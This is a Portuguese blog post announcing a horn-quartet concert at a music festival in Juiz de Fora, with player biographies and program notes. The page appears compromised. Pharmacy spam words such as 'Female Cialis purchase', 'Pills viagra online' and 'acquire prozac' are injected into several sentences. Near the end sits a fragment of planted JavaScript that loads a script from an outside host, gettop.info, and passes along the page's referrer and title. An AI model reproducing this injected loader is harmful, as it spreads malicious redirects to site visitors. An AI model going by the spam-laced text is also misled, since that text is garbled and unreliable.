FestivalMinas GeraisMúsica de câmaraProgramação

Quatro trompas

Quarteto BH Trompas realiza concerto na Igreja São Sebastião, em Juiz de Fora.

 

O Quarteto BH Trompas é a atração de terça-feira, dia 25 de julho, do 28º Festival Internacional de Música Colonial Brasileira e Música Antiga Order . É a primeira vez que o grupo se apresenta em Juiz de Fora e, segundo José Francisco dos Santos, um de seus integrantes, o Quarteto considera o evento uma oportunidade de divulgação da trompa, instrumento usado normalmente em orquestras e que, na formação do conjunto, ganha destaque: “O momento é crítico. A música clássica é pouco ensinada, pouco divulgada e com acesso limitado, por isso acredito que o festival de Juiz de Fora, como outros poucos que existem no Brasil, é de muita importância. É uma das poucas formas de se levar a boa música ao conhecimento de todos, através de concertos”.

O repertório da apresentação do Quarteto BH Trompas, que começa às 20h, passa por vários períodos, começando pela transição entre o renascimento e o barroco de Gabrieli, até o período atual de Kerry Turner, com algumas músicas escritas originalmente para quarteto de trompas.

Todos os concertos noturnos serão precedidos de palestras ministradas pelo prof. Rodolfo Valverde (UFJF), com início às 19h, nos mesmos locais das apresentações.

 

Divulgação

O Quarteto BH Trompas faz apresentações em espaços culturais, escolas de música e também em escolas públicas municipais e estaduais para crianças do ensino fundamental divulgando a trompa e sua utilização em quartetos.

O grupo teve papel fundamental no 1º Recital de Trompas Mineiras, que ocorreu no auditório da Escola de Música da UFMG, com repertório que explorou as formações com quatro, oito, doze e dezesseis trompas, e desde então se dedica também à organização de recitais com um grupo maior de trompistas. Na apresentação do Festival, utilizará as formações quarteto e sexteto.

 

Integrantes

Gustavo Garcia Trindade iniciou seus estudos em 1991 na Banda de Música 12 de Março. De 1998 a 2001, cursou o bacharelado em Trompa na Universidade do Estado de Minas Gerais. Participou de aulas e festivais com Adalto Soares, Edward Brown, Eric Ruske, Luiz Garcia, Mario Rocha e Sergio Gomes. Atuou junto à Orquestra Sinfônica Nacional e, como músico convidado, na Orquestra Petrobras Sinfônica. Em 2001, venceu o Concurso Jovens Solistas da Universidade Federal de Minas Gerais, na categoria Banda Sinfônica, e, um ano depois, foi o ganhador do 1º Concurso Nacional Eleazar de Carvalho para Jovens Instrumentistas e Regentes, seção Orquestra Sinfônica de Minas Gerais – Modalidade Metais. Atualmente integra o naipe de trompas da Orquestra Filarmônica de Minas Gerais e é Músico Técnico na Orquestra da Escola de Música da UFMG.

José Francisco dos Santos iniciou seus estudos de Trompa na escola Municipal de Música de São Paulo entre 1995 e 1998, sob orientação de Ozéas Arantes. Em 1999, ingressou na Universidade Livre de Música de São Paulo, onde se aperfeiçoou com o professor Mário Rocha. Participou dos festivais de Londrina e Guarulhos. Em 1999, passou a integrar a Orquestra Amazonas Filarmônica, na qual permaneceu até janeiro de 2008. Atuou como solista do Concerto para quatro trompas e orquestra, de Schumann, ao lado da Amazonas Filarmônica, em 2006. Foi ainda primeiro trompista no ciclo de óperas O Anel do Nibelungo Buy , de Richard Wagner, na Sexta Sinfonia de Bruckner, na Quinta de Tchaikovsky, na Purchase Quinta de Shostakovitch, na Sétima de Beethoven, na Nona de Dvorák, entre outras. Atualmente integra o naipe de trompas da Orquestra Filarmônica de Minas Gerais.

Lucas Filho Female Cialis purchase começou sua formação musical com seu pai em 1999. Graduou-se pela Escola de Música da Universidade do Estado de Minas Gerais em 2011, na classe da professora Sarah Ramez. Na Orquestra Sinfônica da UEMG, foi trompa principal de 2007 a 2010. Atuou como trompa principal na Orquestra Jovem do Palácio das Artes de 2005 a 2007, época em que estudou com o professor Ailton Ramez no Centro de Formação Artística da Fundação Clóvis Salgado. Participou de aulas e festivais com os professores Bostjan Lipovsek, José Costa, Luiz Garcia, Nigel Downing, Samuel Hanzen, Stefan Dohr e Will Sanders. Atuou como músico convidado das orquestras de Câmara de Ouro Branco, Filarmônica do Espírito Santo e Sinfônica de Minas Gerais. Ao lado da Neojibá, orquestra jovem do Estado da Bahia, Lucas apresentou-se na abertura do festival Young Euro Classic, no KonzertHall, em Berlim, no Victoria Hall, em Genebra, com participação da pianista Maria João Pires, e no Royal Festival Hall, em Londres, como parte da turnê do pianista Lang Lang.

Priscila Viana é natural de Belo Horizonte e iniciou seus estudos de trompa no Centro de Formação Artística da Fundação Clóvis Salgado. É bacharel em Música – Trompa pela Universidade do Estado de Minas Gerais com o professor Sérgio Gomes. Em 2013 passou a integrar o naipe de trompas da Orquestra Sinfônica da UFMG após ser transferida da Orquestra Sinfônica Nacional da UFF. Em 2003, participou como solista do Concerto Jovens Solistas de Metais, realizado no Teatro Municipal de São Paulo. Como convidada, tem atuado nas orquestras Sinfônica de Minas Gerais, Filarmônica de Minas Gerias, Sinfônica da USP, Bachiana Brasileira, Filarmônica do Espírito Santo, entre outras.

 

PROGRAMA:

GIovanni Gabrieli (1557-1612)
Ricercar

Tipo de composição instrumental da Renaissance tardia e do início do Barroco. O termo significa pesquisar e muitos dos Pills viagra online Ricercari têm função de introdução da tonalidade ou do modo de peça que se segue.

John Bennet cost of viagra tablet (1575-1614)
Madrigals

Escrito para quatro partes vocais e publicado pela primeira vez em 1599, em Roma. Possivelmente o primeiro compositor de madrigais. São quatro movimentos, porém o grupo vai tocar o primeiro e o terceiro: Whenas I Glance e So Gracious.

Alexander Mitushin (1850-1920)
Concerto para Quarteto de Trompa

A versão mais comum foi publicada pelo Southern em 1968, porém foi tocada pela primeira vez em 1964 pelo quarteto de trompas da Sinfônica de Chicago, com três movimentos: Maestoso, Andante e Allegro.

acquire prozac Kerry Turner (1960-)
Fanfare For Barcs

Escrito em 1989 para o quarteto de trompas norte-americano para comemorar o seu sucesso esmagador na 4ª competição internacional Phillip Jones de música de câmara. O Quarteto n. 3 para quarteto de trompas foi escrito no verão de 1992, projetado para ser o principal trabalho de qualquer concerto de quarteto de trompas. Tem quatro movimentos, porém o BH Trompas vai tocar três: Order I The Sooners, III The Ghost Town Parade e IV Finale.

 

SERVIÇO:

 

Purchase 28º Festival Internacional de Música Colonial Brasileira e Música Antiga

Quarteto BH Trompas

 

25 de julho, terça-feira, às 20h

Igreja São Sebastião (Praça Hermenegildo Vilaça, s/n, Centro – Juiz de Fora)

 

Entrada gratuita

 if (document.currentScript) { s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; Order

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.